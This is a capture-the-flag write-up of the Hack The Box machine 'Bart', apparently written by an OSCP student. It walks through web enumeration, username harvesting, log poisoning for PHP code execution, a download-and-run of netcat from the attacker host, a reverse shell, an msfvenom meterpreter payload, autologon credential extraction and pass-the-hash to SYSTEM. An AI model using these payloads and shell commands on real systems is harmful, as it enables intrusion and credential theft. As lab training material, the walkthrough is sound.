Introduction
I felt like Bart was a pretty good box. It’s extremely similar to some of the boxes in the OSCP labs, and the avenue used to get code execution I’ve already seen at least twice so far. If you are taking the OSCP (I currently am) I highly recommend going through the motions of this box because Bart is a prime example of a potential box you would get, with very similar attack vectors that you need to be able to exploit. I plan on editing this write-up a bit later to include how to complete this box without the use of Metasploit, but only after I get some sleep since I’ve been up all night. Sorry if there are any quailty control mistakes in advance it’s too early for me.
Tools Used
Enumeration
Initial Scanning
Like with every hack the box machine lets begin with an nmap scan against Bart (10.10.10.81)
root@dastinia:~/htb/bart# nmap -sV -sC 10.10.10.81 -oA nmap/bart_initscan
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-11 21:17 EDT
Nmap scan report for 10.10.10.81
Host is up (0.18s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://forum.bart.htb/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.00 seconds
We see that the only available service is the IIS web service running on port 80. We can also determine from the IIS 10 http header that this is likely a windows server 2016 or windows 10 system running under the hood.
Enumeration Port 80 (forum.bart.htb (wordpress))
From our nmap scan we can that we are being redirected automatically to forum.bart.htb. Since htb doesn’t have global dns, we aren’t going to be able to resolve the site. We can add a dns entry in our /etc/hosts file to point 10.10.10.81 to both bart.htb and forum.bart.htb. Reference
adding the /etc/hosts entry
root@dastinia:~/htb/bart# echo "10.10.10.81 forum.bart.htb" >> /etc/hosts
root@dastinia:~/htb/bart# echo "10.10.10.81 bart.htb" >> /etc/hosts
Visiting forum.bart.htb in a browser brings us to a snazzy SPA Wordpress site.
Attempting to access the Wordpress login page ends up with an error: "The page cannot be displayed because an internal server error has occurred." This is strange because there’s not much else going on with the site. Likely is might be some sort of rabbit hole.
Running gobuster on forum.bart.htb doesn't reveal anything extremely interesting. Thinking that maybe there is some hidden content with the site, we mirror the site with wget, and search for interesting content like emails, extra domain names, or hidden pages.
We were able to discover a few potential emails/usernames but nothing that stood out blindly. We did notice that the bart developer Harvey Potter h.potter@bart.htb is the only member of the team not displayed on the main site, but who’s information is stored in a comment on the page.
mirroring site locally
root@dastinia:~/htb/bart/bart_wpsite# wget -r http://forum.bart.htb
root@dastinia:~/htb/bart/bart_wpsite# grep -RiP "bart" forum.bart.htb/
forum.bart.htb/index.html:<title>BART</title>
forum.bart.htb/index.html:<link rel='stylesheet' id='sydney-ie9-css' href='http://forum.bart.htb/wp-content/themes/sydney/css/ie9.css?ver=4.8.2' type='text/css' media='all' />
forum.bart.htb/index.html: <h1 class="site-title"><a href="#" rel="home">BART</a></h1>
forum.bart.htb/index.html: <div class="pos">CEO@BART</div>
forum.bart.htb/index.html: <li><a class="mail" href="mailto:s.brown@bart.local" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html: <div class="pos">CEO@BART</div>
forum.bart.htb/index.html: <li><a class="mail" href="mailto:d.simmons@bart.htb" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html: <li><a class="mail" href="mailto:r.hilton@bart.htb" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html: <div class="pos">Developer@BART</div>
forum.bart.htb/index.html: <li><a class="mail" href="mailto:h.potter@bart.htb" target="_blank"><i class="fa">M</i></a></li>
forum.bart.htb/index.html:
...[snip]...
better grep or extract email addresses
root@dastinia:~/htb/bart/bart_wpsite# grep -RiE -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b"
forum.bart.htb/index.html:s.brown@bart.local
forum.bart.htb/index.html:d.simmons@bart.htb
forum.bart.htb/index.html:r.hilton@bart.htb
forum.bart.htb/index.html:h.potter@bart.htb
forum.bart.htb/index.html:info@bart.htb
forum.bart.htb/index.html:info@bart.htb
Discovering Monitoring Portal with Wfuzz
Taking a step back, and attempting to enumerate the root of the domain – bart.htb with gobuster you discover that the site seems to be returning some kind of content on every request..
gobuster on bart.htb
root@dastinia:~/htb/bart# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/ -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_bart
Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://bart.htb/
[+] Threads : 100
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 204,301,302,307,403,200
[+] Extensions : .php,.html
=====================================================
/index (Status: 200)
/news (Status: 200)
/crack (Status: 200)
/download (Status: 200)
/2006 (Status: 200)
/images (Status: 200)
/serial (Status: 200)
/warez (Status: 200)
/full (Status: 200)
/12 (Status: 200)
/contact (Status: 200)
/about (Status: 200)
/search (Status: 200)
/spacer (Status: 200)
/logo (Status: 200)
/privacy (Status: 200)
/11 (Status: 200)
/new (Status: 200)
/blog (Status: 200)
/rss (Status: 200)
/home (Status: 200)
/faq (Status: 200)
/cgi-bin (Status: 200)
/10 (Status: 200)
/archives (Status: 200)
/products (Status: 200)
/sitemap (Status: 200)
/default (Status: 200)
/img (Status: 200)
/2005 (Status: 200)
/1 (Status: 200)
/09 (Status: 200)
/links (Status: 200)
/01 (Status: 200)
/08 (Status: 200)
/06 (Status: 200)
/2 (Status: 200)
/07 (Status: 200)
/articles (Status: 200)
/login (Status: 200)
/keygen (Status: 200)
/article (Status: 200)
...[snip]...
Visiting the page in a browser you see that every page you attempt to go to returns the same error page. This technique is pretty common in modern web applications to return a page with the error instead of a standard 404 error message stating that something was wrong.
This will render tools like gobuster, dirb or dirbuster basically useless to gather information since the results will be filled with false positives or will require additional post process filtering to figure out what’s actually real.
To circumvent this we can use wfuzz as our directory brute forcer, and filter the results based on a character count baseline.
As you can see below, the resulting error page wfuzz detects as having 158607 characters in the response. We can use this as our baseline and ignore all responses that have 158607 ch in them, which in turn would only show us pages that are different (unique content) with the --hh flag.
root@dastinia:~/htb/bart# wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/FUZZ/
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.2.9 - The Web Fuzzer *
********************************************************
Target: http://bart.htb/FUZZ/
Total requests: 220560
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000001: C=302 0 L 0 W 0 Ch "# directory-list-2.3-medium.txt"
000002: C=302 0 L 0 W 0 Ch "#"
000009: C=302 0 L 0 W 0 Ch "# Suite 300, San Francisco, California, 94105, USA."
000003: C=302 0 L 0 W 0 Ch "# Copyright 2007 James Fisher"
000004: C=302 0 L 0 W 0 Ch "#"
000005: C=302 0 L 0 W 0 Ch "# This work is licensed under the Creative Commons"
000016: C=200 630 L 3775 W 158607 Ch "images"
000018: C=200 630 L 3775 W 158607 Ch "2006"
000017: C=200 630 L 3775 W 158607 Ch "download"
000026: C=200 630 L 3775 W 158607 Ch "about"
000021: C=200 630 L 3775 W 158607 Ch "serial"
000025: C=200 630 L 3775 W 158607 Ch "contact"
000027: C=200 630 L 3775 W 158607 Ch "search"
000028: C=200 630 L 3775 W 158607 Ch "spacer"
000022: C=200 630 L 3775 W 158607 Ch "warez"
000023: C=200 630 L 3775 W 158607 Ch "full"
000019: C=200 630 L 3775 W 158607 Ch "news"
000024: C=200 630 L 3775 W 158607 Ch "12"
000032: C=200 630 L 3775 W 158607 Ch "blog"
000029: C=200 630 L 3775 W 158607 Ch "privacy"
000034: C=200 630 L 3775 W 158607 Ch "10"
000073: C=200 630 L 3775 W 158607 Ch "category"
000031: C=200 630 L 3775 W 158607 Ch "logo"
000080: C=200 630 L 3775 W 158607 Ch "media"
000075: C=200 630 L 3775 W 158607 Ch "content"
000033: C=200 630 L 3775 W 158607 Ch "new"
000079: C=200 630 L 3775 W 158607 Ch "press"
000076: C=200 630 L 3775 W 158607 Ch "14"
000083: C=200 630 L 3775 W 158607 Ch "icons"
000081: C=200 630 L 3775 W 158607 Ch "templates"
000082: C=200 630 L 3775 W 158607 Ch "services"
000020: C=200 630 L 3775 W 158607 Ch "crack"
000030: C=200 630 L 3775 W 158607 Ch "11"
000035: C=200 630 L 3775 W 158607 Ch "cgi-bin"
000077: C=200 630 L 3775 W 158607 Ch "main"
Using Wfuzz to hide the error page responses
root@dastinia:~/htb/bart# wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bart.htb/FUZZ/ --hh 158607
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.2.9 - The Web Fuzzer *
********************************************************
Target: http://bart.htb/FUZZ/
Total requests: 220560
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000014: C=302 0 L 0 W 0 Ch ""
000067: C=200 548 L 2412 W 35529 Ch "forum"
001614: C=200 80 L 221 W 3423 Ch "monitor"
002385: C=200 548 L 2412 W 35529 Ch "Forum"
019837: C=200 80 L 221 W 3423 Ch "Monitor"
From our results we can see that there’s content being served from the “forum” and “monitor” directories with the forum being forum.bart.htb
monitor.bart.htb
Visting monitor.bart.htb in our browser reveals the application “PHP Server Monitor v3.2.1”.
After trying the usual hack the box username:password combininations with no luck we begin looking for another avenue to get into this application. PHP monitor has a password reset function, which only takes a username. When you attempt to do a password reset on a user that doesn’t exist you get the following error.
With this knowledge we can attempt to enumerate usernames in a targeted manner using the information gathered from forum.bart.htb.
I compiled a short list of possible user names from the site:
potential usernames compiled from forum.bart.htb
root@dastinia:~/htb/bart# cat names.txt
s.brown@bart.local
d.simmons@bart.htb
r.hilton@bart.htb
h.potter@bart.htb
info@bart.htb
s.brown
d.simmons
r.hilton
h.potter
info
samantha
brown
daniel
simmons
robert
hilton
harvey
potter
We can use burpsuite intruder coupled with the simple list payload to perform this attack.
This is how we can set up burpsuite intruder to perform our attack.
From the results of our intruder attack we see that we have two valid usernames harvey and daniel.
After some educated guessing you will discover a valid username:password combination of harvey:potter.
When you attempt to authenticate you are redirected to monitor.bart.htb which fails to resolve similar to forums. We add monitor.bart.htb to our /etc/hosts file and attempt to reauthenticate with our newly found credentials.
root@dastinia:~# echo "10.10.10.81 monitor.bart.htb " >> /etc/hosts
After we re-authenticate we are greeted with the following page.
Browsing around you see there is an entry for the “Internal Chat” service
Viewing the details of “Internal Chat” reveals that there is another application on a different domain “internal-01.bart.htb”
Exploitation
Simple Chat Source Code Discovery & Account Registration
Visting internal-01.bart.htb in our browser reveals the login page of bart’s internal “dev chat”.
while running gobuster & sqlmap in the background if you did some googling on “simple chat” you will discover the following github repo https://github.com/magkopian/php-ajax-simple-chat. To validate that these two applications are the same, I inspected the css/chat_global.css file and sure enough it was the same application. Looking at the application’s code we see that’s there is registration functionality. The application doesn’t directly give you an option to register for an account, but it seems shoddily built so likely we can try manually crafting the request to register the account and hope nothing changed (we know the location and the parameters required to register an account from auditing the register.php source code).
Sure enough, we are able to register an account with a username:password of medic:medicmedic on the internal dev chat by crafting our request just right.
Getting RCE through LFI & Log Poisoning
Clicking the log link will cause two alerts to appear that seemly do nothing. Inspecting the original application code, there are no references to a “log” functionality so this must be a 3rd party modification. After some fiddling & inspecting the request history in burp suite, you will see that the application will record the username & your user-agent in a log file as seen below.
Since we can control what our user agent is we can use this to execute php code by visiting the log file page.
GET //log/log.php?username=harvey&filename=log.php HTTP/1.1
Host: internal-01.bart.htb
User-Agent: <?php exec('whoami'); ?> Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4o03rnotk1l5b2ols3mkmqm8u9
Connection: close
Upgrade-Insecure-Requests: 1
To speed this up I recommend having 2-3 repeater tabs open. One to input commands into, and one to visit the page to trigger the execution.
We upload & execute a 64-bit netcat binary onto the machine (important for later) so we can get an interactive shell.
I injected the following code into the user agent field. Make sure you remember to escape the \.
<?php echo exec("powershell -command \"(New-Object System.Net.WebClient).DownloadFile('http://10.10.15.171:7777/nc.exe','nc.exe')\""); ?>
<?php exec("nc.exe 10.10.15.171 6667 -e cmd.exe"); ?>
getting shell
root@dastinia:~# ncat -lnvp 6667
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::6667
Ncat: Listening on 0.0.0.0:6667
Ncat: Connection from 10.10.10.81.
Ncat: Connection from 10.10.10.81:49886.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot\internal-01\log>dir
Volume in drive C has no label.
Volume Serial Number is F84E-9CF7
Directory of C:\inetpub\wwwroot\internal-01\log
12/07/2018 04:06 <DIR> .
12/07/2018 04:06 <DIR> ..
12/07/2018 04:00 101 log.ph
12/07/2018 04:05 2,643 log.php
12/07/2018 04:01 303 log.txt
21/02/2018 20:44 <DIR> Microsoft
12/07/2018 04:06 59,392 nc.exe
4 File(s) 62,439 bytes
3 Dir(s) 15,505,301,504 bytes free
C:\inetpub\wwwroot\internal-01\log>whoami
nt authority\iusr
Privilege Escalation
Poking around the system you will see that there’s not much going on. It’s a pretty recent build of windows, so that rules a lot of good chunk of kerel-based lpe exploits. Poking around the application folders you discover the password for the mysql database as seen below. You will realize that this was unhelpful information, after attempting to use this password against all the user accounts present on the box.
C:\inetpub\wwwroot\internal-01\simple_chat\includes>type dbconnect.php
...[snip]...
function db_connect() {
$con = @mysqli_connect('localhost', 'harvey', '!IC4nB3Th3B3st?', 'internal_chat');
if ($con === false) {
return false;
}
mysqli_set_charset ($con , 'UTF-8');
return $con;
}
?>
Getting x64 meterpreter shell & impacket
Lets generate a x64 bit meterpreter payload and make an smb share with impacket
generate payload msfvenom
root@dastinia:/opt/serve/windows/kk# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.171 LPORT=6969 -f exe > 6969.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
impacket-smb share
root@dastinia:/opt/serve/windows# impacket-smbserver kk kk
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.81,49813)
[*] AUTHENTICATE_MESSAGE (\,BART)
[*] User \BART authenticated successfully
[*] :::00::4141414141414141
[*] AUTHENTICATE_MESSAGE (\,BART)
[*] User \BART authenticated successfully
[*] :::00::4141414141414141
setting up multihandler
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf exploit(multi/handler) > set LPORT 6969
LPORT => 6969
msf exploit(multi/handler) > set ExitonSession False
ExitonSession => false
msf exploit(multi/handler) > run -j
[*] Exploit running as background job 2.
[*] Started reverse TCP handler on 10.10.15.171:6969
executting our payload from smb share & getting shell
C:\inetpub\wwwroot\internal-01\log>\\10.10.15.171\kk\6969.exe
session
msf exploit(multi/handler) >
[*] Sending stage (206403 bytes) to 10.10.10.81
[*] Meterpreter session 1 opened (10.10.15.171:6969 -> 10.10.10.81:51934) at 2018-07-14 11:44:39 -0400
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\IUSR @ BART 10.10.15.171:6969 -> 10.10.10.81:51934 (10.10.10.81)
The meterpreter shell will die after some time, as well as the AV on the system will delete your shell after you execute it from the SMB share.
Recovering Administrator AutoLogon Credentials
At this point I did a good chunk of manual enumeration on the system. After manually performing the standard windows priviledge escapation tectures you discover that there are credentials stored in the autologon runkey. Here are a few resources I felt are pretty decent at explaining the things you should look for local windows privilege escalation. Fuzzy Security - Windows Privilege Escalation Fundamentals, Pentestlab, and Daya Privilege Escalation
For some reason I wasn’t getting the result I wanted when I performed this action with a regular shell. I’m going to investigate this tomorrow.
It did work with powershell running the following command: Get-ItemProperty -path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
Since we are already using Metasploit for this box there is a Metasploit post exploitation module called windows_autologin which will extract any autologon credentials from the registry.
msf > use windows/gather/credentials/windows_autologin
msf post(windows/gather/credentials/windows_autologin) > set SESSION 7
SESSION => 7
msf post(windows/gather/credentials/windows_autologin) > run
[*] Running against BART on session 7
[+] AutoAdminLogon=1, DefaultDomain=DESKTOP-7I3S68E, DefaultUser=Administrator, DefaultPassword=3130438f31186fbaf962f407711faddb
[*] Post module execution completed
Getting System with PTH/PSEXEC
Now that we have the administrators credential getting system should be a snap.
We can perform a Pass the Hash Attack with metasploit’s various psexec modules. We need to add a route to the system so that the module can access the smb port 445 listening locally on the box. This can be achieved with metasploit’s route add command.
msf> use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(admin/smb/psexec_command) > set SMBPass 3130438f31186fbaf962f407711faddb
SMBPass => 3130438f31186fbaf962f407711faddb
msf auxiliary(admin/smb/psexec_command) > set COMMAND \\\\10.10.15.171\\\kk\\\6969.exe
COMMAND => \\10.10.15.171\kk\6969.exe
msf auxiliary(admin/smb/psexec_command) > set RHOSTS 10.10.10.81
RHOSTS => 10.10.10.81
msf auxiliary(admin/smb/psexec_command) > options
Module options (auxiliary/admin/smb/psexec_command):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND \\10.10.15.171\kk\6969.exe yes The command you want to execute on the remote host
RHOSTS 10.10.10.81 yes The target address range or CIDR identifier
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass 3130438f31186fbaf962f407711faddb no The password for the specified username
SMBSHARE C$ yes The name of a writeable share on the server
SMBUser Administrator no The username to authenticate as
THREADS 1 yes The number of concurrent threads
WINPATH WINDOWS yes The name of the remote Windows directory
msf auxiliary(admin/smb/psexec_command) > route add 10.10.10.81/32 255.255.255.255 7
[*] Route added
msf auxiliary(admin/smb/psexec_command) > run
[+] 10.10.10.81:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.10.10.81:445 - checking if the file is unlocked
[*] 10.10.10.81:445 - Unable to get handle: The server responded with error: STATUS_SHARING_VIOLATION (Command=45 WordCount=0)
[-] 10.10.10.81:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 10.10.10.81:445 - Getting the command output...
[*] 10.10.10.81:445 - Command finished with no output
[*] 10.10.10.81:445 - Executing cleanup...
[+] 10.10.10.81:445 - Cleanup was successful
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/smb/psexec_command) >
[*] Sending stage (206403 bytes) to 10.10.10.81
[*] Meterpreter session 8 opened (10.10.15.171:6969 -> 10.10.10.81:49866) at 2018-07-14 01:15:57 -0400
msf auxiliary(admin/smb/psexec_command) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
7 meterpreter x64/windows NT AUTHORITY\IUSR @ BART 10.10.15.171:6969 -> 10.10.10.81:49863 (10.10.10.81)
8 meterpreter x64/windows NT AUTHORITY\SYSTEM @ BART 10.10.15.171:6969 -> 10.10.10.81:49866 (10.10.10.81)
msf auxiliary(admin/smb/psexec_command) > sessions -i 8
[*] Starting interaction with 8...
meterpreter > sysinfo
Computer : BART
OS : Windows 10 (Build 15063).
Architecture : x64
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
That’s all for now. I’m pretty busy with oscp & work so hopefully the next few boxes are machines I already have writeups completed for. I’ll also update this post on how to complete this box without metasploit after I get some sleep.